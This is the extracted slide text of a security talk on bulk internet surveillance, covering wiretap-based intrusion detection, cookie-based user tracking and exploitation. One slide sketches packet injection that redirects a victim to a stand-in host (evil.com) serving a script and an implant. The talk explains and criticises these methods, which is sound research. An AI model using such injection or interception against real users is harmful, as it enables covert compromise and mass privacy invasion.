the golden age of bulk surveillance nicholas c weaver
play

The Golden Age of Bulk Surveillance Nicholas C Weaver About Me... - PowerPoint PPT Presentation

Sep 19, 2022 •29 likes •369 views

The Golden Age of Bulk Surveillance Nicholas C Weaver About Me... The Golden Age of Internet Surveillance Nicholas Weaver LITE TOP SECRET//SI//REL TO USA, FVEY 2 Not NOBUS (Nobody But Us) The Golden Age of Internet Surveillance Nicholas

  1. The Golden Age of Bulk Surveillance Nicholas C Weaver

  2. About Me... The Golden Age of Internet Surveillance Nicholas Weaver LITE TOP SECRET//SI//REL TO USA, FVEY 2

  3. Not NOBUS (Nobody But Us) The Golden Age of Internet Surveillance Nicholas Weaver 3 US Navy Photograph

  4. Not About Needles In Haystacks The Golden Age of Internet Surveillance Nicholas Weaver 4 Wikimedia Photo

  5. Not About 
 Connecting the Dots The Golden Age of Internet Surveillance Nicholas Weaver 5

  6. Drift Nets to 
 Create Metadata The Golden Age of Internet Surveillance Nicholas Weaver HTTP Request: 
 .doc file: 
 Spotted .onion URL Author X URL: X Is an Iphone? PGP message Mojahadeen Secrets key: X key: X José Ramón García Ares for Wikipedia 6

  7. Pulling Threads 
 To Get Results The Golden Age of Internet Surveillance Nicholas Weaver 7 Wikimedia Photo

  8. A Thread To Pull: 
 Watching an IRC Chat The Golden Age of Internet Surveillance Nicholas Weaver OtherDude: Hey, did you see OtherDude: http://www.bbc.com/news/world-us-canada-16330396? AnonDude: hmmm... AnonDude: HAHAH, that's pretty funny! Intercept captured 12/30/2011 11:32 GMT Step 1: "Use SIGINT" (Signals Intelligence)/DNI (Digital Network Intelligence): Enables identification of AnonDude and developing a 
 "pattern of life" for his online behavior Step 2: "Use CNE" (Computer Network Exploitation): After identification, invoke "exploit by name" to take over AnonDude's computer 8

  9. Start With Your 
 Wiretaps... The Golden Age of Internet Surveillance Nicholas Weaver 9

  10. How They Work: Scalable Network Intrusion Detection Systems The Golden Age of Internet Surveillance Nicholas Weaver Tap Do this in OpenFlow: 
 100 Gbps installs 
 High Volume Filter Is Not BitTorrent? already done H(SIP, DIP) Load Balancer Linear Scaling: 
 10x the money... NIDS Node 10x the bandwidth! NIDS Node NIDS Node 1u gives 1-5 Gbps 10

  11. Inside the NIDS The Golden Age of Internet Surveillance Nicholas Weaver HTTP Request URL = /fubar/ GET HT TP /fu bar/ 1.1.. Host = .... HTTP Request URL = /baz/?id=... GET HTTP /b az/?id= 1f413 1.1... ID = 1f413 Sendmail From = someguy@... 220 mail.domain.target ESMTP Sendmail... To = otherguy@... Unlike conventional NIDS you don't worry about evasion: 
 Anyone who wants to evade uses cryptography instead 11

  12. Which NIDS To Use? The Golden Age of Internet Surveillance Nicholas Weaver • Bro Network Security Monitor (BSD licensee) • Includes a robust suite of protocol parsers • Realtime operation, invokes Bro policy scripts • Requires seeing both sides of the tra ffi c • Lockheed/Martin Vortex (GPL) • Only handles the reassembly: 
 Network tra ffi c to files, then invoke separate parser programs • Near real-time operation • Eagle GLINT by Nexa Technologies • Formerly Amesys (was part of Bull) • Commercial "Intelligence" interception package 12

  13. Tracking People Not Machines: 
 User Identification The Golden Age of Internet Surveillance Nicholas Weaver 13

  14. Tracking People, Not Machines: 
 Cookie Linking The Golden Age of Internet Surveillance Nicholas Weaver 14

  15. Bulk Recording The Golden Age of Internet Surveillance Nicholas Weaver 15

  16. Federated Search The Golden Age of Internet Surveillance Nicholas Weaver Who Viewed This Page? Who Viewed This Page? Who Viewed This Page? Who Viewed This Page? 16

  17. Query Focused Centralized 
 Datasets The Golden Age of Internet Surveillance Nicholas Weaver Username Site: arstechnica.com Site: arstechnica.com Site: arstechnica.com Username: broidsrocks Username: broidsrocks Username: broidsrocks Cookie: 223e77... Cookie: 223e77... Cookie: 223e77... From IP: 10.271.13.1 From IP: 10.271.13.1 From IP: 10.271.13.1 Seen: 2012-12-01 07:32:24 Seen: 2012-12-01 07:32:24 Seen: 2012-12-01 07:32:24 IP Cookie 17

  18. Use SIGINT The Golden Age of Internet Surveillance Nicholas Weaver BBC Pageview AnonDude is... AnonDude's House Double-click Ad Linked User IDs "IP Intelligence" IP Activity History (unmasked VPNs) 18

  19. Computer Network 
 AirPwn -Goatse Exploitation HackingTeam The Golden Age of Internet Surveillance Nicholas Weaver HTTP 302 FOUND Black Market RATs location: http://www.evil.com/pwnme.js HackingTeam GET /script.js HTTP/1.1 HTTP 200 OK GET /pwnme.js HTTP/1.1 GET /script.js HTTP/1.1 GET /theimplant HTTP/1.1 FinFisher host: www.targetdomain.com ..... host: www.evil.com host: www.targetdomain.com host: www.evil.com cookie: id=iamavictim cookie: id=iamavictim Metasploit HackingTeam HTTP 200 OK .... FinFisher Here's an exploit... NSA Eagle from the EFF 
 19 Rat from OpenClipart

  20. Put It In Action: 
 Running on the "Cylon" Network The Golden Age of Internet Surveillance Nicholas Weaver Intel NUC computer DualComm Gbps Tap $836.37 connect to http://basestar.local to access the UI 20

  21. A Canned Demo... The Golden Age of Internet Surveillance Nicholas Weaver 21

  22. The Golden Age of Internet Surveillance Nicholas Weaver 22

  23. The Golden Age of Internet Surveillance Nicholas Weaver 23

  24. The Golden Age of Internet Surveillance Nicholas Weaver 24

  25. The Golden Age of Internet Surveillance Nicholas Weaver 25

  26. The Golden Age of Internet Surveillance Nicholas Weaver 26

  27. The Golden Age of Internet Surveillance Nicholas Weaver 27

  28. The Golden Age of Internet Surveillance Nicholas Weaver 28

  29. The Golden Age of Internet Surveillance Nicholas Weaver 29

  30. The Golden Age of Internet Surveillance Nicholas Weaver 30

  31. This is Hobby Stu ff ... The Golden Age of Internet Surveillance Nicholas Weaver 31 Wikipedia (Tobias Grosch)

  32. So Who Are 
 Your Friends? The Golden Age of Internet Surveillance Nicholas Weaver 32 From amcharts.com

  33. So What Now? 
 Go Dark The Golden Age of Internet Surveillance Nicholas Weaver 33

  34. Because What's The Opposite Of NOBUS? The Golden Age of Internet Surveillance Nicholas Weaver • Upcoming UC Berkeley CS 194 (Practical Networking) project #2: 
 Build an NSA style surveillance suite... 34

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Edge Caches and Localization Nicholas Weaver International Computer Science Institute

Edge Caches and Localization Nicholas Weaver International Computer Science Institute

Edge Caches and Localization Nicholas Weaver International Computer Science Institute (Apologies for my absence) Bulk data P2P shifts costs By default, bulk-data P2P shifts the deliver costs from the content provider to the retail ISPs

302 views • 6 slides
ICSI Updates: Netalyzr Nicholas Weaver International Computer Science Institute 1

ICSI Updates: Netalyzr Nicholas Weaver International Computer Science Institute 1

Netalyzr Weaver ICSI Updates: Netalyzr Nicholas Weaver International Computer Science Institute 1 Acknowledgements Where do I donate -User Feedback Netalyzr Weaver Joint Work with Christian Kreibich (ICSI), Martin Dam (Aalborg

417 views • 10 slides
(and How To Break It) Nicholas C Weaver 1 Tor: The Onion Router Anonymous Websurfing CS 161

(and How To Break It) Nicholas C Weaver 1 Tor: The Onion Router Anonymous Websurfing CS 161

CS161 Computer Security Weaver and Popa (and How To Break It) Nicholas C Weaver 1 Tor: The Onion Router Anonymous Websurfing CS 161 Computer Security Weaver and Popa Tor actually encompasses many di ff erent components The Tor

599 views • 46 slides
Injection Attacks and Memory Safety Nicholas Weaver based on David Wagners slides from Sp

Injection Attacks and Memory Safety Nicholas Weaver based on David Wagners slides from Sp

Computer Science 161 Fall 2016 Nicholas Weaver Injection Attacks and Memory Safety Nicholas Weaver based on David Wagners slides from Sp 2016 1 Administrivia Computer Science 161 Fall 2016 Nicholas Weaver You really really really

944 views • 50 slides
Surveillance and Tuberculosis Nicholas K. Reul, MD, MPH reni235@Lni.wa.gov Associate Medical

Surveillance and Tuberculosis Nicholas K. Reul, MD, MPH reni235@Lni.wa.gov Associate Medical

Respirable Crystalline Silica: Medical Surveillance and Tuberculosis Nicholas K. Reul, MD, MPH reni235@Lni.wa.gov Associate Medical Director for Occupational Disease June 8, 2017 Purpose of Medical Surveillance Identify adverse health

379 views • 8 slides
"Secure" Coding Practices Nicholas Weaver based on David Wagners slides from Sp 2016

"Secure" Coding Practices Nicholas Weaver based on David Wagners slides from Sp 2016

Computer Science 161 Fall 2016 Nicholas Weaver "Secure" Coding Practices Nicholas Weaver based on David Wagners slides from Sp 2016 1 Administrivia Computer Science 161 Fall 2016 Nicholas Weaver 2 Computer Science 161 Fall

732 views • 61 slides
Netalyzr for Android: Challenges and opportunities Narseo Vallina-Rodriguez Nicholas Weaver

Netalyzr for Android: Challenges and opportunities Narseo Vallina-Rodriguez Nicholas Weaver

Netalyzr for Android: Challenges and opportunities Narseo Vallina-Rodriguez Nicholas Weaver Christian Kreibich Vern Paxson ICSI-UC Berkeley AIMS CAIDA, San Diego 03/26/2014 The problem: People care about their

562 views • 14 slides
Sho Show Me the Money w Me the Money Characterizing Spam-advertised Revenue Nicholas Weaver

Sho Show Me the Money w Me the Money Characterizing Spam-advertised Revenue Nicholas Weaver

Sho Show Me the Money w Me the Money Characterizing Spam-advertised Revenue Nicholas Weaver Damon McCoy Chris Kanich Tristan Halvorson Christian Kreibich Kirill Levchenko Vern Paxson Geoffrey M. Voelker Stefan Savage UC San Diego

1.07k views • 22 slides
Loopholes to Circumvent the Constitution Unrestrained Bulk Surveillance on Americans by

Loopholes to Circumvent the Constitution Unrestrained Bulk Surveillance on Americans by

Loopholes to Circumvent the Constitution Unrestrained Bulk Surveillance on Americans by Collecting Network Traffic Abroad Axel Arnbak 1 Sharon Goldberg 2 1 Faculty, Institute for Information Law (IViR, University of Amsterdam); Affiliate, Harvard

621 views • 60 slides
and Interaction-based Third-party Cookie Policy Istemi Ekin Akkus 1 , Nicholas Weaver 2 1 Max

and Interaction-based Third-party Cookie Policy Istemi Ekin Akkus 1 , Nicholas Weaver 2 1 Max

The Case for a General and Interaction-based Third-party Cookie Policy Istemi Ekin Akkus 1 , Nicholas Weaver 2 1 Max Planck Institute for Software Systems (MPI-SWS) 2 ICSI & UC Berkeley Sample Web Page Content Optimized with Ad web

855 views • 28 slides
Securing Web Content Joakim Koskela, Nicholas Weaver, Andrei Gurtov and Mark Allman ReArch'09

Securing Web Content Joakim Koskela, Nicholas Weaver, Andrei Gurtov and Mark Allman ReArch'09

Securing Web Content Joakim Koskela, Nicholas Weaver, Andrei Gurtov and Mark Allman ReArch'09 Rome, December 1 s t 2009 2009-12-01 2009-12-01 How do we protect the user without dwarfing the web experience? Nature of the web has changed

464 views • 30 slides
Computer Science 161: Computer Security Computer Science 161 Fall 2016 Popa and Weaver

Computer Science 161: Computer Security Computer Science 161 Fall 2016 Popa and Weaver

Computer Science 161: Computer Security Computer Science 161 Fall 2016 Popa and Weaver Prof. Raluca Ada Popa Nicholas Weaver http://inst.eecs.berkeley.edu/~cs161/ 1 And a team of talented TAs Computer Science 161 Fall 2016 Popa and

866 views • 42 slides
Bulk Density and Void Content Bulk Density Bulk density ( n .) the mass of a unit volume of bulk

Bulk Density and Void Content Bulk Density Bulk density ( n .) the mass of a unit volume of bulk

Bulk Density and Void Content Bulk Density Bulk density ( n .) the mass of a unit volume of bulk aggregate including the volume of the individual particles and the volume of the voids between them. m kg agg bulk density 3 V m

1.45k views • 30 slides
Workflow Plus Bulk Request Actions Tool for Synergy Enterprise What is This Tool ? Allows

Workflow Plus Bulk Request Actions Tool for Synergy Enterprise What is This Tool ? Allows

Workflow Plus Bulk Request Actions Tool for Synergy Enterprise What is This Tool ? Allows Synergy Administrators to manage bulk updates of requests to change statuses. These include: Bulk Approve Bulk Realize Bulk Process

267 views • 8 slides
A Golden Investment Opportunity 1 Golden Eagle Mining An Overview Golden Eagle

A Golden Investment Opportunity 1 Golden Eagle Mining An Overview Golden Eagle

Main document title here 08 March 2011 A Golden Investment Opportunity 1 Golden Eagle Mining An Overview Golden Eagle Mining (GEM) is a mineral exploration and development company with a primary focus on gold, in proven

573 views • 15 slides
(In)Visibility and Surveillance Questions Surveillance & Security Positives to surveillance

(In)Visibility and Surveillance Questions Surveillance & Security Positives to surveillance

(In)Visibility and Surveillance Questions Surveillance & Security Positives to surveillance added security. Negatives to surveillance loss of privacy Dis-Appearance dis-appearance refers to the processes whereby a visible

496 views • 15 slides
Brief History of ISGIDAR First 10 Presidents Bob Schuster Bill Woolverton Roland

Brief History of ISGIDAR First 10 Presidents Bob Schuster Bill Woolverton Roland

Brief History of ISGIDAR First 10 Presidents Bob Schuster Bill Woolverton Roland Griffiths Nancy Ator Bob Balster Harriet de Wit Chris-Ellyn Dick Meisch Johanson John Hughes Marilyn Carroll Woods and

279 views • 12 slides
Created by Rev. Beth Caulfield 10/2014 Caulfield 10/14 JOHN WESLEY AND SMALL GROUPS Holy

Created by Rev. Beth Caulfield 10/2014 Caulfield 10/14 JOHN WESLEY AND SMALL GROUPS Holy

Created by Rev. Beth Caulfield 10/2014 Caulfield 10/14 JOHN WESLEY AND SMALL GROUPS Holy Club Lay-driven Small Group Ministries Caulfield 10/14 HEBREWS 10:24-26 (CEB) 24 AND LET US CONSIDER EACH OTHER CAREFULLY

734 views • 51 slides
Ephesians 4:1-6 NIV Therefore I, a prisoner for serving the Lord, beg you to lead a life worthy

Ephesians 4:1-6 NIV Therefore I, a prisoner for serving the Lord, beg you to lead a life worthy

Ephesians 4:1-6 NIV Therefore I, a prisoner for serving the Lord, beg you to lead a life worthy of your calling, for you have been called by God. 2 Always be humble and gentle . Be patient with each other, making allowance for each others

177 views • 14 slides
Project : School t Hofke context: school and green area city: Eindhoven country: the

Project : School t Hofke context: school and green area city: Eindhoven country: the

Project : School t Hofke context: school and green area city: Eindhoven country: the Netherlands Architecture Education

616 views • 57 slides
MTF July 2020 Meeting Medicare Updates Presentation Transcription Introduction Presenters: Kathy

MTF July 2020 Meeting Medicare Updates Presentation Transcription Introduction Presenters: Kathy

MTF July 2020 Meeting Medicare Updates Presentation Transcription Introduction Presenters: Kathy Grant and Kathleen Gouveia from SHINE Subject matter experts: (Title slide) Slide 1: CHANGES TO MEDICARE AND BENEFITS ELIGIBILITY UNDER COVID-19

82 views • 7 slides
International and Student Experience (Academic Administration and Support) The administration

International and Student Experience (Academic Administration and Support) The administration

International and Student Experience (Academic Administration and Support) The administration of Erasmus+ (student and staff mobility) within the Conservatoire Sarah Ward Assistant Registrar (International and Student Experience)

402 views • 27 slides
GRADUATION AND COMMISSIONING WEEK Helpful Hint, Tips, and Ideas It is well worth the trip

GRADUATION AND COMMISSIONING WEEK Helpful Hint, Tips, and Ideas It is well worth the trip

GRADUATION AND COMMISSIONING WEEK Helpful Hint, Tips, and Ideas It is well worth the trip to see a USNA Graduation You will experience a lifetime of memories Share wonderful experiences with your Firstie, family, and friends!

317 views • 17 slides
2021-23 BIENNIAL BUDGET PRESENTATION Indiana Commission for Higher Education President Geoffrey

2021-23 BIENNIAL BUDGET PRESENTATION Indiana Commission for Higher Education President Geoffrey

2021-23 BIENNIAL BUDGET PRESENTATION Indiana Commission for Higher Education President Geoffrey S. Mearns October 8, 2020 Indianas Public Research University Fall 2020 Enrollment: 21,597 86% on-campus students are Indiana Residents

397 views • 25 slides

More recommend